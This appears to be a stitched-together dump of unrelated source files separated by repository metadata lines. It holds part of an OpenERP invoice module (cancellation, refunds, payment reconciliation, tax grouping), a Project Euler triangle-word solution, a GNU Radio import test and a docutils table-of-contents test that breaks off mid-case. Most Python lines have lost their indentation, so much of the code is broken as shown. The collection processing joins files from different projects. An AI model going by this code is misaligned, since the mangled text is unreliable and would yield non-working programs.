        #TODO: not the correct fix, but fresh values are required before reading them.
self.write({})
for inv in self:
self.write({'internal_number': inv.number})
if inv.type in ('in_invoice', 'in_refund'):
if not inv.reference:
ref = inv.number
else:
ref = inv.reference
else:
ref = inv.number
self._cr.execute(""" UPDATE account_move SET ref=%s
WHERE id=%s AND (ref IS NULL OR ref = '')""",
(ref, inv.move_id.id))
self._cr.execute(""" UPDATE account_move_line SET ref=%s
WHERE move_id=%s AND (ref IS NULL OR ref = '')""",
(ref, inv.move_id.id))
self._cr.execute(""" UPDATE account_analytic_line SET ref=%s
FROM account_move_line
WHERE account_move_line.move_id = %s AND
account_analytic_line.move_id = account_move_line.id""",
(ref, inv.move_id.id))
self.invalidate_cache()
return True
@api.multi
def action_cancel(self):
moves = self.env['account.move']
for inv in self:
if inv.move_id:
moves += inv.move_id
if inv.payment_ids:
for move_line in inv.payment_ids:
if move_line.reconcile_partial_id.line_partial_ids:
raise except_orm(_('Error!'), _('You cannot cancel an invoice which is partially paid. You need to unreconcile related payment entries first.'))
# First, set the invoices as cancelled and detach the move ids
self.write({'state': 'cancel', 'move_id': False})
if moves:
# second, invalidate the move(s)
moves.button_cancel()
# delete the move this invoice was pointing to
# Note that the corresponding move_lines and move_reconciles
# will be automatically deleted too
moves.unlink()
self._log_event(-1.0, 'Cancel Invoice')
return True
###################
@api.multi
def _log_event(self, factor=1.0, name='Open Invoice'):
#TODO: implement messages system
return True
@api.multi
def name_get(self):
TYPES = {
'out_invoice': _('Invoice'),
'in_invoice': _('Supplier Invoice'),
'out_refund': _('Refund'),
'in_refund': _('Supplier Refund'),
}
result = []
for inv in self:
result.append((inv.id, "%s %s" % (inv.number or TYPES[inv.type], inv.name or '')))
return result
@api.model
def name_search(self, name, args=None, operator='ilike', limit=100):
args = args or []
recs = self.browse()
if name:
recs = self.search([('number', '=', name)] + args, limit=limit)
if not recs:
recs = self.search([('name', operator, name)] + args, limit=limit)
return recs.name_get()
@api.model
def _refund_cleanup_lines(self, lines):
""" Convert records to dict of values suitable for one2many line creation
:param recordset lines: records to convert
        :return: list of command tuples for one2many line creation [(0, 0, dict of values), ...]
"""
result = []
for line in lines:
values = {}
for name, field in line._fields.iteritems():
if name in MAGIC_COLUMNS:
continue
elif field.type == 'many2one':
values[name] = line[name].id
elif field.type not in ['many2many', 'one2many']:
values[name] = line[name]
elif name == 'invoice_line_tax_id':
values[name] = [(6, 0, line[name].ids)]
result.append((0, 0, values))
return result
@api.model
def _prepare_refund(self, invoice, date=None, period_id=None, description=None, journal_id=None):
""" Prepare the dict of values to create the new refund from the invoice.
This method may be overridden to implement custom
refund generation (making sure to call super() to establish
a clean extension chain).
:param record invoice: invoice to refund
:param string date: refund creation date from the wizard
:param integer period_id: force account.period from the wizard
:param string description: description of the refund from the wizard
:param integer journal_id: account.journal from the wizard
:return: dict of value to create() the refund
"""
values = {}
for field in ['name', 'reference', 'comment', 'date_due', 'partner_id', 'company_id',
'account_id', 'currency_id', 'payment_term', 'user_id', 'fiscal_position']:
if invoice._fields[field].type == 'many2one':
values[field] = invoice[field].id
else:
values[field] = invoice[field] or False
values['invoice_line'] = self._refund_cleanup_lines(invoice.invoice_line)
tax_lines = filter(lambda l: l.manual, invoice.tax_line)
values['tax_line'] = self._refund_cleanup_lines(tax_lines)
if journal_id:
journal = self.env['account.journal'].browse(journal_id)
elif invoice['type'] == 'in_invoice':
journal = self.env['account.journal'].search([('type', '=', 'purchase_refund')], limit=1)
else:
journal = self.env['account.journal'].search([('type', '=', 'sale_refund')], limit=1)
values['journal_id'] = journal.id
values['type'] = TYPE2REFUND[invoice['type']]
values['date_invoice'] = date or fields.Date.context_today(invoice)
values['state'] = 'draft'
values['number'] = False
values['origin'] = invoice.number
if period_id:
values['period_id'] = period_id
if description:
values['name'] = description
return values
@api.multi
@api.returns('self')
def refund(self, date=None, period_id=None, description=None, journal_id=None):
new_invoices = self.browse()
for invoice in self:
# create the new invoice
values = self._prepare_refund(invoice, date=date, period_id=period_id,
description=description, journal_id=journal_id)
new_invoices += self.create(values)
return new_invoices
@api.v8
def pay_and_reconcile(self, pay_amount, pay_account_id, period_id, pay_journal_id,
writeoff_acc_id, writeoff_period_id, writeoff_journal_id, name=''):
        # TODO check if we can use a different period for the payment and the writeoff line
assert len(self)==1, "Can only pay one invoice at a time."
# Take the seq as name for move
SIGN = {'out_invoice': -1, 'in_invoice': 1, 'out_refund': 1, 'in_refund': -1}
direction = SIGN[self.type]
# take the chosen date
date = self._context.get('date_p') or fields.Date.context_today(self)
# Take the amount in currency and the currency of the payment
if self._context.get('amount_currency') and self._context.get('currency_id'):
amount_currency = self._context['amount_currency']
currency_id = self._context['currency_id']
else:
amount_currency = False
currency_id = False
pay_journal = self.env['account.journal'].browse(pay_journal_id)
if self.type in ('in_invoice', 'in_refund'):
ref = self.reference
else:
ref = self.number
partner = self.partner_id._find_accounting_partner(self.partner_id)
name = name or self.invoice_line[0].name or self.number
# Pay attention to the sign for both debit/credit AND amount_currency
l1 = {
'name': name,
'debit': direction * pay_amount > 0 and direction * pay_amount,
'credit': direction * pay_amount < 0 and -direction * pay_amount,
'account_id': self.account_id.id,
'partner_id': partner.id,
'ref': ref,
'date': date,
'currency_id': currency_id,
'amount_currency': direction * (amount_currency or 0.0),
'company_id': self.company_id.id,
}
l2 = {
'name': name,
'debit': direction * pay_amount < 0 and -direction * pay_amount,
'credit': direction * pay_amount > 0 and direction * pay_amount,
'account_id': pay_account_id,
'partner_id': partner.id,
'ref': ref,
'date': date,
'currency_id': currency_id,
'amount_currency': -direction * (amount_currency or 0.0),
'company_id': self.company_id.id,
}
move = self.env['account.move'].create({
'ref': ref,
'line_id': [(0, 0, l1), (0, 0, l2)],
'journal_id': pay_journal_id,
'period_id': period_id,
'date': date,
})
move_ids = (move | self.move_id).ids
self._cr.execute("SELECT id FROM account_move_line WHERE move_id IN %s",
(tuple(move_ids),))
lines = self.env['account.move.line'].browse([r[0] for r in self._cr.fetchall()])
lines2rec = lines.browse()
total = 0.0
for line in itertools.chain(lines, self.payment_ids):
if line.account_id == self.account_id:
lines2rec += line
total += (line.debit or 0.0) - (line.credit or 0.0)
inv_id, name = self.name_get()[0]
if not round(total, self.env['decimal.precision'].precision_get('Account')) or writeoff_acc_id:
lines2rec.reconcile('manual', writeoff_acc_id, writeoff_period_id, writeoff_journal_id)
else:
code = self.currency_id.symbol
# TODO: use currency's formatting function
msg = _("Invoice partially paid: %s%s of %s%s (%s%s remaining).") % \
(pay_amount, code, self.amount_total, code, total, code)
self.message_post(body=msg)
lines2rec.reconcile_partial('manual')
# Update the stored value (fields.function), so we write to trigger recompute
return self.write({})
@api.v7
def pay_and_reconcile(self, cr, uid, ids, pay_amount, pay_account_id, period_id, pay_journal_id,
writeoff_acc_id, writeoff_period_id, writeoff_journal_id, context=None, name=''):
recs = self.browse(cr, uid, ids, context)
return recs.pay_and_reconcile(pay_amount, pay_account_id, period_id, pay_journal_id,
writeoff_acc_id, writeoff_period_id, writeoff_journal_id, name=name)
class account_invoice_line(models.Model):
_name = "account.invoice.line"
_description = "Invoice Line"
_order = "invoice_id,sequence,id"
@api.one
@api.depends('price_unit', 'discount', 'invoice_line_tax_id', 'quantity',
'product_id', 'invoice_id.partner_id', 'invoice_id.currency_id')
def _compute_price(self):
price = self.price_unit * (1 - (self.discount or 0.0) / 100.0)
taxes = self.invoice_line_tax_id.compute_all(price, self.quantity, product=self.product_id, partner=self.invoice_id.partner_id)
self.price_subtotal = taxes['total']
if self.invoice_id:
self.price_subtotal = self.invoice_id.currency_id.round(self.price_subtotal)
@api.model
def _default_price_unit(self):
if not self._context.get('check_total'):
return 0
total = self._context['check_total']
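        # Work backwards from the encoded total: subtract each existing line's
        # discounted price and its taxes; the remainder becomes the default
        # unit price for the new line.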
for l in self._context.get('invoice_line', []):
if isinstance(l, (list, tuple)) and len(l) >= 3 and l[2]:
vals = l[2]
price = vals.get('price_unit', 0) * (1 - vals.get('discount', 0) / 100.0)
total = total - (price * vals.get('quantity'))
taxes = vals.get('invoice_line_tax_id')
if taxes and len(taxes[0]) >= 3 and taxes[0][2]:
taxes = self.env['account.tax'].browse(taxes[0][2])
tax_res = taxes.compute_all(price, vals.get('quantity'),
product=vals.get('product_id'), partner=self._context.get('partner_id'))
for tax in tax_res['taxes']:
total = total - tax['amount']
return total
@api.model
def _default_account(self):
# XXX this gets the default account for the user's company,
# it should get the default account for the invoice's company
# however, the invoice's company does not reach this point
if self._context.get('type') in ('out_invoice', 'out_refund'):
return self.env['ir.property'].get('property_account_income_categ', 'product.category')
else:
return self.env['ir.property'].get('property_account_expense_categ', 'product.category')
name = fields.Text(string='Description', required=True)
origin = fields.Char(string='Source Document',
help="Reference of the document that produced this invoice.")
sequence = fields.Integer(string='Sequence', default=10,
help="Gives the sequence of this line when displaying the invoice.")
invoice_id = fields.Many2one('account.invoice', string='Invoice Reference',
ondelete='cascade', index=True)
uos_id = fields.Many2one('product.uom', string='Unit of Measure',
ondelete='set null', index=True)
product_id = fields.Many2one('product.product', string='Product',
ondelete='restrict', index=True)
account_id = fields.Many2one('account.account', string='Account',
required=True, domain=[('type', 'not in', ['view', 'closed'])],
default=_default_account,
help="The income or expense account related to the selected product.")
    price_unit = fields.Float(string='Unit Price', required=True,
        digits=dp.get_precision('Product Price'),
        default=_default_price_unit)
    price_subtotal = fields.Float(string='Amount', digits=dp.get_precision('Account'),
        store=True, readonly=True, compute='_compute_price')
    quantity = fields.Float(string='Quantity', digits=dp.get_precision('Product Unit of Measure'),
        required=True, default=1)
    discount = fields.Float(string='Discount (%)', digits=dp.get_precision('Discount'),
        default=0.0)
invoice_line_tax_id = fields.Many2many('account.tax',
'account_invoice_line_tax', 'invoice_line_id', 'tax_id',
string='Taxes', domain=[('parent_id', '=', False)])
account_analytic_id = fields.Many2one('account.analytic.account',
string='Analytic Account')
company_id = fields.Many2one('res.company', string='Company',
related='invoice_id.company_id', store=True, readonly=True)
partner_id = fields.Many2one('res.partner', string='Partner',
related='invoice_id.partner_id', store=True, readonly=True)
@api.model
def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):
res = super(account_invoice_line, self).fields_view_get(
view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)
if self._context.get('type'):
doc = etree.XML(res['arch'])
for node in doc.xpath("//field[@name='product_id']"):
if self._context['type'] in ('in_invoice', 'in_refund'):
node.set('domain', "[('purchase_ok', '=', True)]")
else:
node.set('domain', "[('sale_ok', '=', True)]")
res['arch'] = etree.tostring(doc)
return res
@api.multi
def product_id_change(self, product, uom_id, qty=0, name='', type='out_invoice',
partner_id=False, fposition_id=False, price_unit=False, currency_id=False,
company_id=None):
context = self._context
company_id = company_id if company_id is not None else context.get('company_id', False)
self = self.with_context(company_id=company_id, force_company=company_id)
if not partner_id:
raise except_orm(_('No Partner Defined!'), _("You must first select a partner!"))
if not product:
if type in ('in_invoice', 'in_refund'):
return {'value': {}, 'domain': {'uos_id': []}}
else:
return {'value': {'price_unit': 0.0}, 'domain': {'uos_id': []}}
values = {}
part = self.env['res.partner'].browse(partner_id)
fpos = self.env['account.fiscal.position'].browse(fposition_id)
if part.lang:
self = self.with_context(lang=part.lang)
product = self.env['product.product'].browse(product)
values['name'] = product.partner_ref
if type in ('out_invoice', 'out_refund'):
account = product.property_account_income or product.categ_id.property_account_income_categ
else:
account = product.property_account_expense or product.categ_id.property_account_expense_categ
account = fpos.map_account(account)
if account:
values['account_id'] = account.id
if type in ('out_invoice', 'out_refund'):
taxes = product.taxes_id or account.tax_ids
if product.description_sale:
values['name'] += '\n' + product.description_sale
else:
taxes = product.supplier_taxes_id or account.tax_ids
if product.description_purchase:
values['name'] += '\n' + product.description_purchase
taxes = fpos.map_tax(taxes)
values['invoice_line_tax_id'] = taxes.ids
if type in ('in_invoice', 'in_refund'):
values['price_unit'] = price_unit or product.standard_price
else:
values['price_unit'] = product.lst_price
values['uos_id'] = product.uom_id.id
if uom_id:
uom = self.env['product.uom'].browse(uom_id)
if product.uom_id.category_id.id == uom.category_id.id:
values['uos_id'] = uom_id
domain = {'uos_id': [('category_id', '=', product.uom_id.category_id.id)]}
company = self.env['res.company'].browse(company_id)
currency = self.env['res.currency'].browse(currency_id)
if company and currency:
if company.currency_id != currency:
if type in ('in_invoice', 'in_refund'):
values['price_unit'] = product.standard_price
values['price_unit'] = values['price_unit'] * currency.rate
if values['uos_id'] and values['uos_id'] != product.uom_id.id:
values['price_unit'] = self.env['product.uom']._compute_price(
product.uom_id.id, values['price_unit'], values['uos_id'])
return {'value': values, 'domain': domain}
@api.multi
def uos_id_change(self, product, uom, qty=0, name='', type='out_invoice', partner_id=False,
fposition_id=False, price_unit=False, currency_id=False, company_id=None):
context = self._context
        company_id = company_id if company_id is not None else context.get('company_id', False)
self = self.with_context(company_id=company_id)
result = self.product_id_change(
product, uom, qty, name, type, partner_id, fposition_id, price_unit,
currency_id, company_id=company_id,
)
warning = {}
if not uom:
result['value']['price_unit'] = 0.0
if product and uom:
prod = self.env['product.product'].browse(product)
prod_uom = self.env['product.uom'].browse(uom)
if prod.uom_id.category_id != prod_uom.category_id:
warning = {
'title': _('Warning!'),
'message': _('The selected unit of measure is not compatible with the unit of measure of the product.'),
}
result['value']['uos_id'] = prod.uom_id.id
if warning:
result['warning'] = warning
return result
@api.model
def move_line_get(self, invoice_id):
inv = self.env['account.invoice'].browse(invoice_id)
currency = inv.currency_id.with_context(date=inv.date_invoice)
company_currency = inv.company_id.currency_id
res = []
for line in inv.invoice_line:
mres = self.move_line_get_item(line)
mres['invl_id'] = line.id
res.append(mres)
tax_code_found = False
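            # A line may carry several taxes: the first tax with a base code
            # annotates the original move line; subsequent ones append zero-
            # amount copies so that each base code is reported exactly once.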
taxes = line.invoice_line_tax_id.compute_all(
(line.price_unit * (1.0 - (line.discount or 0.0) / 100.0)),
line.quantity, line.product_id, inv.partner_id)['taxes']
for tax in taxes:
if inv.type in ('out_invoice', 'in_invoice'):
tax_code_id = tax['base_code_id']
tax_amount = tax['price_unit'] * line.quantity * tax['base_sign']
else:
tax_code_id = tax['ref_base_code_id']
tax_amount = tax['price_unit'] * line.quantity * tax['ref_base_sign']
if tax_code_found:
if not tax_code_id:
continue
res.append(dict(mres))
res[-1]['price'] = 0.0
res[-1]['account_analytic_id'] = False
elif not tax_code_id:
continue
tax_code_found = True
res[-1]['tax_code_id'] = tax_code_id
res[-1]['tax_amount'] = currency.compute(tax_amount, company_currency)
return res
@api.model
def move_line_get_item(self, line):
return {
'type': 'src',
'name': line.name.split('\n')[0][:64],
'price_unit': line.price_unit,
'quantity': line.quantity,
'price': line.price_subtotal,
'account_id': line.account_id.id,
'product_id': line.product_id.id,
'uos_id': line.uos_id.id,
'account_analytic_id': line.account_analytic_id.id,
'taxes': line.invoice_line_tax_id,
}
#
# Set the tax field according to the account and the fiscal position
#
@api.multi
def onchange_account_id(self, product_id, partner_id, inv_type, fposition_id, account_id):
if not account_id:
return {}
unique_tax_ids = []
account = self.env['account.account'].browse(account_id)
if not product_id:
fpos = self.env['account.fiscal.position'].browse(fposition_id)
unique_tax_ids = fpos.map_tax(account.tax_ids).ids
else:
product_change_result = self.product_id_change(product_id, False, type=inv_type,
partner_id=partner_id, fposition_id=fposition_id, company_id=account.company_id.id)
if 'invoice_line_tax_id' in product_change_result.get('value', {}):
unique_tax_ids = product_change_result['value']['invoice_line_tax_id']
return {'value': {'invoice_line_tax_id': unique_tax_ids}}
class account_invoice_tax(models.Model):
_name = "account.invoice.tax"
_description = "Invoice Tax"
_order = 'sequence'
@api.one
@api.depends('base', 'base_amount', 'amount', 'tax_amount')
def _compute_factors(self):
self.factor_base = self.base_amount / self.base if self.base else 1.0
self.factor_tax = self.tax_amount / self.amount if self.amount else 1.0
    invoice_id = fields.Many2one('account.invoice', string='Invoice',
        ondelete='cascade', index=True)
name = fields.Char(string='Tax Description',
required=True)
account_id = fields.Many2one('account.account', string='Tax Account',
required=True, domain=[('type', 'not in', ['view', 'income', 'closed'])])
account_analytic_id = fields.Many2one('account.analytic.account', string='Analytic account')
base = fields.Float(string='Base', digits=dp.get_precision('Account'))
amount = fields.Float(string='Amount', digits=dp.get_precision('Account'))
manual = fields.Boolean(string='Manual', default=True)
sequence = fields.Integer(string='Sequence',
help="Gives the sequence order when displaying a list of invoice tax.")
base_code_id = fields.Many2one('account.tax.code', string='Base Code',
help="The account basis of the tax declaration.")
base_amount = fields.Float(string='Base Code Amount', digits=dp.get_precision('Account'),
default=0.0)
tax_code_id = fields.Many2one('account.tax.code', string='Tax Code',
help="The tax basis of the tax declaration.")
tax_amount = fields.Float(string='Tax Code Amount', digits=dp.get_precision('Account'),
default=0.0)
company_id = fields.Many2one('res.company', string='Company',
related='account_id.company_id', store=True, readonly=True)
    factor_base = fields.Float(string='Multiplication factor for Base code',
        compute='_compute_factors')
    factor_tax = fields.Float(string='Multiplication factor for Tax code',
        compute='_compute_factors')
@api.multi
def base_change(self, base, currency_id=False, company_id=False, date_invoice=False):
factor = self.factor_base if self else 1
company = self.env['res.company'].browse(company_id)
if currency_id and company.currency_id:
currency = self.env['res.currency'].browse(currency_id)
currency = currency.with_context(date=date_invoice or fields.Date.context_today(self))
base = currency.compute(base * factor, company.currency_id, round=False)
return {'value': {'base_amount': base}}
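    # Conversions here and in amount_change() are done at the invoice date
    # (falling back to today) because currency rates are date-dependent,
    # hence the with_context(date=...) on the currency record.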
@api.multi
def amount_change(self, amount, currency_id=False, company_id=False, date_invoice=False):
company = self.env['res.company'].browse(company_id)
if currency_id and company.currency_id:
currency = self.env['res.currency'].browse(currency_id)
currency = currency.with_context(date=date_invoice or fields.Date.context_today(self))
amount = currency.compute(amount, company.currency_id, round=False)
return {'value': {'tax_amount': amount}}
@api.v8
def compute(self, invoice):
tax_grouped = {}
currency = invoice.currency_id.with_context(date=invoice.date_invoice or fields.Date.context_today(invoice))
company_currency = invoice.company_id.currency_id
for line in invoice.invoice_line:
taxes = line.invoice_line_tax_id.compute_all(
(line.price_unit * (1 - (line.discount or 0.0) / 100.0)),
line.quantity, line.product_id, invoice.partner_id)['taxes']
for tax in taxes:
val = {
'invoice_id': invoice.id,
'name': tax['name'],
'amount': tax['amount'],
'manual': False,
'sequence': tax['sequence'],
'base': currency.round(tax['price_unit'] * line['quantity']),
}
if invoice.type in ('out_invoice','in_invoice'):
val['base_code_id'] = tax['base_code_id']
val['tax_code_id'] = tax['tax_code_id']
val['base_amount'] = currency.compute(val['base'] * tax['base_sign'], company_currency, round=False)
val['tax_amount'] = currency.compute(val['amount'] * tax['tax_sign'], company_currency, round=False)
val['account_id'] = tax['account_collected_id'] or line.account_id.id
val['account_analytic_id'] = tax['account_analytic_collected_id']
else:
val['base_code_id'] = tax['ref_base_code_id']
val['tax_code_id'] = tax['ref_tax_code_id']
val['base_amount'] = currency.compute(val['base'] * tax['ref_base_sign'], company_currency, round=False)
val['tax_amount'] = currency.compute(val['amount'] * tax['ref_tax_sign'], company_currency, round=False)
val['account_id'] = tax['account_paid_id'] or line.account_id.id
val['account_analytic_id'] = tax['account_analytic_paid_id']
# If the taxes generate moves on the same financial account as the invoice line
# and no default analytic account is defined at the tax level, propagate the
# analytic account from the invoice line to the tax line. This is necessary
                # in situations where (part of) the taxes cannot be reclaimed,
# to ensure the tax move is allocated to the proper analytic account.
if not val.get('account_analytic_id') and line.account_analytic_id and val['account_id'] == line.account_id.id:
val['account_analytic_id'] = line.account_analytic_id.id
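                # Group tax values by (tax code, base code, account) so that
                # invoice lines sharing the same tax yield a single tax line.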
key = (val['tax_code_id'], val['base_code_id'], val['account_id'])
                if key not in tax_grouped:
tax_grouped[key] = val
else:
tax_grouped[key]['base'] += val['base']
tax_grouped[key]['amount'] += val['amount']
tax_grouped[key]['base_amount'] += val['base_amount']
tax_grouped[key]['tax_amount'] += val['tax_amount']
for t in tax_grouped.values():
t['base'] = currency.round(t['base'])
t['amount'] = currency.round(t['amount'])
t['base_amount'] = currency.round(t['base_amount'])
t['tax_amount'] = currency.round(t['tax_amount'])
return tax_grouped
@api.v7
def compute(self, cr, uid, invoice_id, context=None):
recs = self.browse(cr, uid, [], context)
invoice = recs.env['account.invoice'].browse(invoice_id)
return recs.compute(invoice)
@api.model
def move_line_get(self, invoice_id):
res = []
self._cr.execute(
'SELECT * FROM account_invoice_tax WHERE invoice_id = %s',
(invoice_id,)
)
for row in self._cr.dictfetchall():
if not (row['amount'] or row['tax_code_id'] or row['tax_amount']):
continue
res.append({
'type': 'tax',
'name': row['name'],
'price_unit': row['amount'],
'quantity': 1,
'price': row['amount'] or 0.0,
'account_id': row['account_id'],
'tax_code_id': row['tax_code_id'],
'tax_amount': row['tax_amount'],
'account_analytic_id': row['account_analytic_id'],
})
return res
class res_partner(models.Model):
# Inherits partner and adds invoice information in the partner form
_inherit = 'res.partner'
invoice_ids = fields.One2many('account.invoice', 'partner_id', string='Invoices',
readonly=True, copy=False)
def _find_accounting_partner(self, partner):
'''
Find the partner for which the accounting entries will be created
'''
return partner.commercial_partner_id
class mail_compose_message(models.Model):
_inherit = 'mail.compose.message'
@api.multi
def send_mail(self):
context = self._context
if context.get('default_model') == 'account.invoice' and \
context.get('default_res_id') and context.get('mark_invoice_as_sent'):
invoice = self.env['account.invoice'].browse(context['default_res_id'])
invoice = invoice.with_context(mail_post_autofollow=True)
invoice.write({'sent': True})
invoice.message_post(body=_("Invoice sent"))
return super(mail_compose_message, self).send_mail()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
beyoungwoo/C_glibc_Sample
|
_Algorithm/ProjectEuler_python/euler_42.py
|
1
|
2038
|
#!/usr/bin/python -Wall
# -*- coding: utf-8 -*-
"""
Project Euler, Problem 42: Coded triangle numbers
(projecteuler.net, published 25 April 2003, difficulty rating 5%)

The n-th term of the sequence of triangle numbers is given by
t(n) = n * (n + 1) / 2, so the first ten triangle numbers are:

    1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...

By converting each letter in a word to a number corresponding to its
alphabetical position and adding these values we form a word value. For
example, the word value for SKY is 19 + 11 + 25 = 55 = t(10). If the word
value is a triangle number then we shall call the word a triangle word.

Using words.txt, a 16K text file containing nearly two-thousand common
English words, how many are triangle words?
"""
import re
tri = []
for i in range(1, 50):
    res = i * (i + 1) / 2
    tri.append(res)
def is_triangle(num):
global tri
tri_len = len(tri)
for i in range(0, tri_len):
if (num == tri[i]):
return True
elif (num < tri[i]):
return False
return False
count = 0
fread = open("p42words.txt", "r")
for line in fread:
text = re.split("\"", line)
total_text = list(text)
len_t = len(total_text)
for i in range(0, len_t):
if total_text[i].startswith(','):
continue
        ret = [ord(c) for c in total_text[i]]
        len_ret = len(ret)
        # ord('A') is 65, so subtracting 64 per letter maps 'A'..'Z' to 1..26
        if is_triangle(sum(ret) - (64 * len_ret)):
            count += 1
            print total_text[i], sum(ret) - (64 * len_ret)
print "total=", count
#a = 'hi'
#print [ord(c) for c in a]
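# Editor's sketch (not part of the original solution): the same count can be
# computed with a precomputed set of triangle numbers for O(1) membership
# tests; it assumes the same "p42words.txt" file read above.
def count_triangle_words(path="p42words.txt"):
    triangle_set = set(n * (n + 1) / 2 for n in range(1, 50))
    words = [w for w in open(path).read().replace('"', '').split(',') if w]
    return sum(1 for w in words
               if sum(ord(c) - 64 for c in w) in triangle_set)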
|
gpl-3.0
|
pgoeser/gnuradio
|
gr-comedi/src/qa_comedi.py
|
15
|
1240
|
#!/usr/bin/env python
#
# Copyright 2005,2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import comedi
class qa_comedi (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_000_nop (self):
"""Just see if we can import the module...
They may not have COMEDI library, etc. Don't try to run anything"""
pass
if __name__ == '__main__':
gr_unittest.main ()
|
gpl-3.0
|
ojengwa/oh-mainline
|
vendor/packages/docutils/test/test_transforms/test_contents.py
|
19
|
10659
|
#! /usr/bin/env python
# $Id: test_contents.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
Tests for `docutils.transforms.parts.Contents` (via
`docutils.transforms.universal.LastReaderPending`).
"""
from __init__ import DocutilsTestSupport
from docutils.transforms.references import Substitutions
from docutils.parsers.rst import Parser
def suite():
parser = Parser()
s = DocutilsTestSupport.TransformTestSuite(parser)
s.generateTests(totest)
return s
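# Each ``totest`` entry maps a label to a tuple of transform classes plus a
# list of [input, expected pseudo-XML] pairs; generateTests() above turns
# every pair into an individual test case.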
totest = {}
totest['tables_of_contents'] = ((Substitutions,), [
["""\
.. contents::
Title 1
=======
Paragraph 1.
Title_ 2
--------
Paragraph 2.
_`Title` 3
``````````
Paragraph 3.
Title 4
-------
Paragraph 4.
""",
"""\
<document source="test data">
<topic classes="contents" ids="contents" names="contents">
<title>
Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-1">
Title 1
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-2">
Title
2
<bullet_list>
<list_item>
<paragraph>
<reference ids="id3" refid="title-3">
Title
3
<list_item>
<paragraph>
<reference ids="id4" refid="title-4">
Title 4
<section ids="title-1" names="title\ 1">
<title refid="id1">
Title 1
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title>
<reference name="Title" refname="title">
Title
2
<paragraph>
Paragraph 2.
<section ids="title-3" names="title\ 3">
<title refid="id3">
<target ids="title" names="title">
Title
3
<paragraph>
Paragraph 3.
<section ids="title-4" names="title\ 4">
<title refid="id4">
Title 4
<paragraph>
Paragraph 4.
"""],
["""\
.. contents:: Table of Contents
Title 1
=======
Paragraph 1.
Title 2
-------
Paragraph 2.
""",
"""\
<document source="test data">
<topic classes="contents" ids="table-of-contents" names="table\ of\ contents">
<title>
Table of Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-1">
Title 1
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-2">
Title 2
<section ids="title-1" names="title\ 1">
<title refid="id1">
Title 1
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title refid="id2">
Title 2
<paragraph>
Paragraph 2.
"""],
["""\
.. contents:: There's an image in Title 2
Title 1
=======
Paragraph 1.
|Title 2|
=========
Paragraph 2.
.. |Title 2| image:: title2.png
""",
"""\
<document source="test data">
<topic classes="contents" ids="there-s-an-image-in-title-2" names="there's\ an\ image\ in\ title\ 2">
<title>
There's an image in Title 2
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-1">
Title 1
<list_item>
<paragraph>
<reference ids="id2" refid="title-2">
Title 2
<section ids="title-1" names="title\ 1">
<title refid="id1">
Title 1
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title refid="id2">
<image alt="Title 2" uri="title2.png">
<paragraph>
Paragraph 2.
<substitution_definition names="Title\ 2">
<image alt="Title 2" uri="title2.png">
"""], # emacs cruft: "
["""\
.. contents::
:depth: 2
Title 1
=======
Paragraph 1.
Title 2
-------
Paragraph 2.
Title 3
```````
Paragraph 3.
Title 4
-------
Paragraph 4.
""",
"""\
<document source="test data">
<topic classes="contents" ids="contents" names="contents">
<title>
Contents
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-1">
Title 1
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-2">
Title 2
<list_item>
<paragraph>
<reference ids="id3" refid="title-4">
Title 4
<section ids="title-1" names="title\ 1">
<title refid="id1">
Title 1
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title refid="id2">
Title 2
<paragraph>
Paragraph 2.
<section ids="title-3" names="title\ 3">
<title>
Title 3
<paragraph>
Paragraph 3.
<section ids="title-4" names="title\ 4">
<title refid="id3">
Title 4
<paragraph>
Paragraph 4.
"""],
["""\
Title 1
=======
.. contents::
:local:
Paragraph 1.
Title 2
-------
Paragraph 2.
Title 3
```````
Paragraph 3.
Title 4
-------
Paragraph 4.
""",
"""\
<document source="test data">
<section ids="title-1" names="title\ 1">
<title>
Title 1
<topic classes="contents local" ids="contents" names="contents">
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="title-2">
Title 2
<bullet_list>
<list_item>
<paragraph>
<reference ids="id2" refid="title-3">
Title 3
<list_item>
<paragraph>
<reference ids="id3" refid="title-4">
Title 4
<paragraph>
Paragraph 1.
<section ids="title-2" names="title\ 2">
<title refid="id1">
Title 2
<paragraph>
Paragraph 2.
<section ids="title-3" names="title\ 3">
<title refid="id2">
Title 3
<paragraph>
Paragraph 3.
<section ids="title-4" names="title\ 4">
<title refid="id3">
Title 4
<paragraph>
Paragraph 4.
"""],
["""\
.. contents::
:local:
Test duplicate name "Contents".
Section
--------
Paragraph.
""",
"""\
<document source="test data">
<topic classes="contents local" ids="contents" names="contents">
<bullet_list>
<list_item>
<paragraph>
<reference ids="id1" refid="section">
Section
<paragraph>
Test duplicate name "Contents".
<section ids="section" names="section">
<title refid="id1">
Section
<paragraph>
Paragraph.
"""],
["""\
.. contents::
:backlinks: top
Section
--------
Paragraph.
""",
"""\
